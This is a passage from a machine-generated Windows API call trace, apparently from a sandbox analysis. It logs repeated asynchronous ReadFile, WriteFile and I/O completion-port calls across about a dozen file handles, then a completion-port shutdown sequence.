lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4e50020) returned 1 [0149.876] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.876] ReadFile (in: hFile=0xd8, lpBuffer=0x4f70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4f70020 | out: lpBuffer=0x4f70124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4f70020) returned 1 [0149.877] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.877] ReadFile (in: hFile=0x628, lpBuffer=0x5090124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x5090020 | out: lpBuffer=0x5090124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x5090020) returned 1 [0149.877] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.877] ReadFile (in: hFile=0x618, lpBuffer=0x51b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x51b0020 | out: lpBuffer=0x51b0124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x51b0020) returned 1 [0149.877] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.878] ReadFile (in: hFile=0x66c, lpBuffer=0x52d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x52d0020 | out: lpBuffer=0x52d0124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x52d0020) returned 1 [0149.878] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.878] ReadFile (in: hFile=0x61c, lpBuffer=0x53f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x53f0020 | out: lpBuffer=0x53f0124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x53f0020) returned 1 [0149.878] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.878] ReadFile (in: hFile=0x610, lpBuffer=0x5510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x5510020 | out: lpBuffer=0x5510124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x5510020) returned 1 [0149.878] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.878] ReadFile (in: hFile=0x678, lpBuffer=0x5630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x5630020 | out: lpBuffer=0x5630124*, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x5630020) returned 1 [0149.879] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.879] WriteFile (in: hFile=0x634, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x74d9, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x41f0020) returned 1 [0149.879] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.880] WriteFile (in: hFile=0x13c, lpBuffer=0x4670124*, nNumberOfBytesToWrite=0x7eb0, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4670020) returned 1 [0149.880] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.880] WriteFile (in: hFile=0x650, lpBuffer=0x4790124*, nNumberOfBytesToWrite=0x25b6, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4790020) returned 1 [0149.880] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.880] WriteFile (in: hFile=0x64c, lpBuffer=0x48b0124*, nNumberOfBytesToWrite=0x8c39, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x48b0020) returned 1 [0149.881] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.881] WriteFile (in: hFile=0x624, lpBuffer=0x49d0124*, nNumberOfBytesToWrite=0x10898, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x49d0020) returned 1 [0149.881] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.882] WriteFile (in: hFile=0x654, lpBuffer=0x4af0124*, nNumberOfBytesToWrite=0x1106f, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4af0020) returned 1 [0149.882] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.882] WriteFile (in: hFile=0x660, lpBuffer=0x4c10124*, nNumberOfBytesToWrite=0x14f6e, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4c10020) returned 1 [0149.883] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.883] WriteFile (in: hFile=0x138, lpBuffer=0x4d30124*, nNumberOfBytesToWrite=0x79b3, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4d30020 | out: lpBuffer=0x4d30124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4d30020) returned 1 [0149.883] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.883] WriteFile (in: hFile=0x63c, lpBuffer=0x4e50124*, nNumberOfBytesToWrite=0xcc93, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4e50020 | out: lpBuffer=0x4e50124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4e50020) returned 1 [0149.884] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.884] WriteFile (in: hFile=0xd8, lpBuffer=0x4f70124*, nNumberOfBytesToWrite=0x1605c, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4f70020 | out: lpBuffer=0x4f70124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x4f70020) returned 1 [0149.884] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.885] WriteFile (in: hFile=0x628, lpBuffer=0x5090124*, nNumberOfBytesToWrite=0x14d93, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x5090020 | out: lpBuffer=0x5090124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x5090020) returned 1 [0149.885] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.885] WriteFile (in: hFile=0x618, lpBuffer=0x51b0124*, nNumberOfBytesToWrite=0x425d, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x51b0020 | out: lpBuffer=0x51b0124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x51b0020) returned 1 [0149.885] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.886] WriteFile (in: hFile=0x66c, lpBuffer=0x52d0124*, nNumberOfBytesToWrite=0xa4d4, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x52d0020 | out: lpBuffer=0x52d0124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x52d0020) returned 1 [0149.886] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.886] WriteFile (in: hFile=0x61c, lpBuffer=0x53f0124*, nNumberOfBytesToWrite=0x41ec, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x53f0020 | out: lpBuffer=0x53f0124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x53f0020) returned 1 [0149.886] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.886] WriteFile (in: hFile=0x610, lpBuffer=0x5510124*, nNumberOfBytesToWrite=0x21d2, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x5510020 | out: lpBuffer=0x5510124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x5510020) returned 1 [0149.887] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.887] WriteFile (in: hFile=0x678, lpBuffer=0x5630124*, nNumberOfBytesToWrite=0xf96f, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x5630020 | out: lpBuffer=0x5630124*, lpNumberOfBytesWritten=0x446f878, lpOverlapped=0x5630020) returned 1 [0149.887] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.887] ReadFile (in: hFile=0x634, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0149.887] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.888] ReadFile (in: hFile=0x13c, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4670020) returned 0x0 [0149.888] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.888] ReadFile (in: hFile=0x650, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4790020) returned 0x0 [0149.888] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.888] ReadFile (in: hFile=0x64c, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x48b0020) returned 0x0 [0149.888] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.888] ReadFile (in: hFile=0x624, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x49d0020) returned 0x0 [0149.888] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.888] ReadFile (in: hFile=0x654, lpBuffer=0x4af0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4af0020 | out: lpBuffer=0x4af0124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4af0020) returned 0x0 [0149.889] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.889] ReadFile (in: hFile=0x660, lpBuffer=0x4c10124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4c10020 | out: lpBuffer=0x4c10124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4c10020) returned 0x0 [0149.889] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.889] ReadFile (in: hFile=0x138, lpBuffer=0x4d30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4d30020 | out: lpBuffer=0x4d30124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4d30020) returned 0x0 [0149.889] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.889] ReadFile (in: hFile=0x63c, lpBuffer=0x4e50124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4e50020 | out: lpBuffer=0x4e50124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4e50020) returned 0x0 [0149.889] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.889] ReadFile (in: hFile=0xd8, lpBuffer=0x4f70124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x4f70020 | out: lpBuffer=0x4f70124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x4f70020) returned 0x0 [0149.889] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.890] ReadFile (in: hFile=0x628, lpBuffer=0x5090124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x5090020 | out: lpBuffer=0x5090124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x5090020) returned 0x0 [0149.890] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.890] ReadFile (in: hFile=0x618, lpBuffer=0x51b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x51b0020 | out: lpBuffer=0x51b0124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x51b0020) returned 0x0 [0149.890] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.890] ReadFile (in: hFile=0x66c, lpBuffer=0x52d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x52d0020 | out: lpBuffer=0x52d0124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x52d0020) returned 0x0 [0149.890] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.890] ReadFile (in: hFile=0x61c, lpBuffer=0x53f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x53f0020 | out: lpBuffer=0x53f0124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x53f0020) returned 0x0 [0149.890] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.891] ReadFile (in: hFile=0x610, lpBuffer=0x5510124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x5510020 | out: lpBuffer=0x5510124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x5510020) returned 0x0 [0149.891] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 1 [0149.891] ReadFile (in: hFile=0x678, lpBuffer=0x5630124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x446f878, lpOverlapped=0x5630020 | out: lpBuffer=0x5630124, lpNumberOfBytesRead=0x446f878*=0x0, lpOverlapped=0x5630020) returned 0x0 [0149.891] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.891] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0149.891] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.891] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0149.891] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.891] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0149.891] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.892] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x48b0020) returned 1 [0149.892] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.892] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0149.892] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.892] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0149.892] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.892] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4c10020) returned 1 [0149.892] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.892] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4d30020) returned 1 [0149.892] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.892] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4e50020) returned 1 [0149.893] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.893] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4f70020) returned 1 [0149.893] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.893] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x5090020) returned 1 [0149.893] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x446f878, lpCompletionKey=0x446f874, lpOverlapped=0x446f87c) returned 0 [0149.893] PostQueuedCompletionStatus (CompletionPort=0x5e0, 